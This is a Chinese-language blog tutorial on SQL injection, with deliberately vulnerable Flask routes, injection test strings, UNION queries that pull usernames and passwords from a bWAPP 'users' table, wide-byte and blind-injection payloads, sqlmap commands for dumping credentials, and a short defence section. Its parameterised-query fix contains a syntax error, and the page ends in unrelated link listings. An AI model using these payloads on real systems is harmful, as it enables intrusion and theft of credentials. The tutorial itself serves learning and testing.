零、前言

  最近做专心web安全有一段时间了,但是目测后面的活会有些复杂,涉及到更多的中间件、底层安全、漏洞研究与安全建设等越来越复杂的东东,所以在这里想写一个系列关于web安全基础以及一些讨巧的payload技巧以便于备忘。不是大神、博客内容非常基础,如果真的有人看而且是大牛们,请不要喷我,欢迎指正我的错误(水平有限)。

一、SQL注入的本质:

  用户的输入与代码中的SQL语句拼接,可以构成完整的有效的可执行的数据库增删改查操作指令,送入web程序中被执行。攻击者的关键在于猜测并构造完整的可执行的SQL语句。

二、SQL注入的分类:

  1、数字类:

 #数字类:

 @app.route("/sqlinjection",methods=["GET","POST"])

 def sqlinjection():

     id = request.args.get("id")

     sql  = "select * from tablename where id='%s';"%str(id)

     cur.execute(sql)

     ret = cur.fetchall()

     return jsonify({"data":ret})

 #攻击数字型:

 """

 #GET:

 https://www.text.com/sqlinjection?id=1and1=1(适用于python、php等动态类型语言)

 https://www.text.com/sqlinjection?id=1and1=2(适用于python、php等动态类型语言)

 https://www.text.com/sqlinjection?id=1+1(适用于java、C++等静态类型语言)

 #POST

 id 在POST数据部分,其他没有差别

 """

  2、字符串类:

 #字符串类:

 @app.route("/sqlinjection",methods=["GET","POST"])

 def sqlinjection():

     strid = request.args.get("strid")

     sql  = "select * from tablename where strid='%s';"%str(strid)

     cur.execute(sql)

     ret = cur.fetchall()

     return jsonify({"data":ret})

 #攻击字符串型:

 """

 #GET:

 https://www.text.com/sqlinjection?strid=1'and'1'='1

 https://www.text.com/sqlinjection?id=1'and'1'='2

 使用'或者使用" 根据情况而定

 #POST

 strid 在POST数据部分,其他没有差别

 """

  3、模糊字符串类:

 #模糊字符串查询类:

 @app.route("/sqlinjection",methods=["GET","POST"])

 def sqlinjection():

     strid = request.args.get("strid")

     sql  = "select * from tablename where strid like ‘%%s%;"%str(strid)

     cur.execute(sql)

     ret = cur.fetchall()

     return jsonify({"data":ret})

 #攻击模糊字符串查询型:

 """

 #GET:

 https://www.text.com/sqlinjection?strid=1%'%20or%20strid%20like%20'%2

 使用'或者使用" 根据情况而定

 #POST

 strid 在POST数据部分,其他没有差别

 """

三、常用手工暴数据:

 #常用手工暴数据流程(MySQL):

 """

 1、首先验证是否有漏洞,and 1=1 and 1=2 字符型时候记得加引号和注释符,数字型看情况加注释符,加注释符号的原因是注释掉后面的语句,排除干扰。

 2、验证有洞后,观察能显示的数据项,一般使用order by x 即可。

 3、union all select x,x,x,database(),x,x balabala 获取数据名称  @version 获取数据库版本也是重要的

 4、获取表名

 ' and 1=0 union all select 1,table_schema,table_name,4,5,6,7 from information_schema.tables where table_schema != 'mysql' and table_schema != 'information_schema' -- -

 5、获取列名

 ' and 1=0 union all select 1,table_name, column_name,4,5,6,7 from information_schema.columns where table_schema != 'mysql' and table_schema != 'information_schema' and table_schema='bWAPP' and table_name='users' -- - 

 6、获取数据

  ' and 1=0 union all select 1,login,password,secret,email,admin,7 from users-- -

 """

四、宽字节注入:

  1、%BF%27 addslashes给‘也就是%27加\成了%BF%5C%27 ->�' 后面跟and sleep(5) -- - ok  利用编码方式规避。

五、盲注:

  1、盲注指的是不通过直接显示数据库中的数据而是通过响应的不同来猜解数据。
  #这种不同:
  (1)延时返回
  (2)条件判断响应(条件为真,语句执行。调价为假,语句不执行,结果不同)
  (3)错误不同
  #一般来说就是
  (1)基于时间类型的盲注
  (2)基于布尔类型的盲注
  (3)基于异常类型的盲注

  2、首先讲一下时间盲注

 #sleep(5) 延时响应(mysql)

 #delay '0:0:5' 延时响应(mssql)

  通过判断 IF 如何如何 条件成立时候执行延时语句,通过响应时间来判断条件是否成立。
  这种if 语句可以如下:

 """

 if(expr1,result1,result2)#如果expr1成立 result1 否则 result2

 #常用:

     sleep(5)->延时5s

     substring(string_var_name,1,1)

     #数字分别是起始位置下标 以及 长度benchmark用来做到标准延时,其实没有必须用的必要,执行什么什么多少次。

     #所以一个SQL盲注可以构造

     select * from tablename where id='103' and if(substring(database(),1,1)='a',sleep(5),null)';

 """

  3、布尔类型盲注

    简单的常用 or 1=1 1=2 ‘1’=‘1’ ‘2’=‘1’这种如果注入点在order_by 后面 可以如下构造利用order_by if(1,1,(select 1 union select 2)) limit 0,x

六、SQLMAP使用:

 #、基本GET 类型:

 python sqlmap.py -u "http://www.a.b.c.d?id=123"#多个参数指定参数时用*

 python sqlmap.py -u "http://www.a.b.c.d?id=123"--dbs #爆数据库类型

 python sqlmap.py -u "http://www.a.b.c.d?id=123"--current-db #当前使用的数据库

 python sqlmap.py -u "http://www.a.b.c.d?id=123"--current-users #暴当前用户

 python sqlmap.py -u "http://www.a.b.c.d?id=123"--users #暴用户

 python sqlmap.py -u "http://www.a.b.c.d?id=123"--passwords #暴密码

 python sqlmap.py -u "http://www.a.b.c.d?id=123"-D currentdatabase --tables #当前使用的表

 python sqlmap.py -u "http://www.a.b.c.d?id=123"-D currentdatabase -T  tablename --columns #暴字段

 python sqlmap.py -u "http://www.a.b.c.d?id=123"-D currentdatabase -T  tablename -C "name1,name2,..." --dump #暴数据

 #、POST

 #burp抓包保存为 post.txt

 sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs  #其他类似

 sqlmap.py -u "http://192.168.160.1/sqltest/post.php" --forms  #自动寻找表单字段,交互式询问确定

 sqlmap -u http://xxx.xxx.com/Login.asp --data "n=1&p=1"

七、SQLMAP一些注意点:

 #、https 时候记得host后面需要时加上:

 #、--smart 启发式扫描

 #、*号更适合json请求数据

 #、常用的python sqlmap.py -l/r post.txt --level  --risk  --dbs --smart

八、防御:

1、过滤,使用标准的语言内置的过滤函数,或者自写过滤函数,需要过滤的一般有:'   "   %20   #    -   =   以及SQL关键词。

2、预编译或者使用ODD\PDO(代码web框架里面的的数据库操作类)等:

 @app.route("/sqlinjection",methods=["GET","POST"])

 def sqlinjection():

     strid = request.args.get("strid")

     cur.execute(""select * from tablename where strid = '%s';",(strid))

     ret = cur.fetchall()

     return jsonify({"data":ret})

WEB安全第四篇--与数据库的亲密接触:SQL注入攻击的更多相关文章

  1. MySQL数据库(六)-- SQL注入攻击、视图、事物、存储过程、流程控制

    一.SQL注入攻击 1.什么是SQL注入攻击 一些了解sql语法的用户,可以输入一些关键字 或合法sql,来导致原始的sql逻辑发生变化,从而跳过登录验证 或者 删除数据库 import pymysq ...

  2. MySQL数据库(六) —— SQL注入攻击、视图、事物、存储过程、流程控制

    SQL注入攻击.视图.事物.存储过程.流程控制 一.SQL注入攻击 1.什么是SQL注入攻击 import pymysql conn = pymysql.Connect( user="roo ...

  3. 数据库防火墙如何防范SQL注入行为

    SQL注入是当前针对数据库安全进行外部攻击的一种常见手段.现有主流应用大多基于B/S架构开发,SQL注入的攻击方式正是利用web层和通讯层的缺陷对数据库进行外部恶意攻击.将SQL命令巧妙的插入通讯的交 ...

  4. 【数据库】SQL注入攻击

    背景: 机房收费系统验收的时候,师父提到SQL注入攻击.自己以前看过类似的博客大概知道一些这方面的事情,于是自己动手查了查. 定义: 所谓SQL注入,通过SQL命令插入到Web表单提交或者输入域名或页 ...

  5. 【渗透攻防WEB篇】SQL注入攻击初级

    前言不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动.在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一,这里我想问 ...

  6. 【渗透攻防Web篇】SQL注入攻击高级

    前言 前面我们学习了如何寻找,确认,利用SQL注入漏洞的技术,本篇文章我将介绍一些更高级的技术,避开过滤,绕开防御.有攻必有防,当然还要来探讨一下SQL注入防御技巧. 目录 第五节 避开过滤方法总结 ...

  7. 【web渗透技术】渗透攻防Web篇-SQL注入攻击初级

    [web渗透技术]渗透攻防Web篇-SQL注入攻击初级 前言不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动.在网络中,数据库驱动的Web应用随处可见,由此而存在的S ...

  8. web安全之SQL注入---第四章 如何进行SQL注入攻击

    第四章 如何进行SQL注入攻击1.数字注入2.字符串注入    '#    '--

  9. web前端安全 XSS跨站脚本 CSRF跨站请求伪造 SQL注入

    web安全,从前端做起,总结下web前端安全的几种技术: 1,XSS XSS的全称是Cross Site Scripting,意思是跨站脚本,XSS的原理也就是往HTML中注入脚本,HTML指定了脚本 ...

随机推荐

  1. DataGridView使用技巧十:单元格表示值的自定义

    通过CellFormatting事件,可以自定义单元格的表示值.(比如:值为Error的时候,单元格被设定为红色) 示例: private void dgv_Users_CellFormatting( ...

  2. web工程jar包问题

    JRE System Library主要存放J2SE的标准jar,一般不需要调整. Referenced Libraries是存放第三方的jar包,也就是自己导入的jar包.在项目属性的Java Bu ...

  3. hadoop错误之ClassNotFoundException(下)

    hadoop开发环境:window上eclipse+虚拟机的ubuntu13.04+hadoop-1.1.2+JDK1.7 在win7下运行hadoop-1.1.2 worldcount代码的时候出现 ...

  4. jQuery 中的编程范式

    浏览器前端编程的面貌自2005年以来已经发生了深刻的变化,这并不简单的意味着出现了大量功能丰富的基础库,使得我们可以更加方便的编写业务代码,更重要的是我们看待前端技术的观念发生了重大转变,明确意识到了 ...

  5. [android] AndroidManifest.xml 详解

    第1部分 标签库+包路径+版本控制 <manifest xmlns:android="http://schemas.android.com/apk/res/android" ...

  6. Eclipse使用技巧收集

    因为学习Java相关,对Eclipse这个开发工具用的不习惯,许多操作以及快捷键在百度得到解决后下次又忘记了.有时使用VS又混淆了它的快捷键操作.所以写个备忘录持续更新收集平时遇到的操作. 导入项目, ...

  7. vs2008 x64编译环境 忽略了 #ifdef WIN32

    解决方法: 右键项目属性,在预处理器中添加WIN32即可 效果:

  8. Onject.Instantiate实例

    该函数有两个函数原型: Object Instantiate(Object original,Vector3 position,Quaternion rotation); Onject Instant ...

  9. 解决error: Your local changes to the following files would be overwritten by merge

    在项目里我们一般都会把自己第一次提交的配置文件忽略本地跟踪 1 [Sun@webserver2 demo]$ git update-index --assume-unchanged <filen ...

  10. Oracle:create pfile from spfile:rac下要小心该操作啊!

    默认在原位置创建一个pfile的ora初始化参数文件!! 这在rac下会带来问题,因为rac下,当使用asm存储时,instance的启动参数文件就是pfile(其内容是指向一个spfile).如果不 ...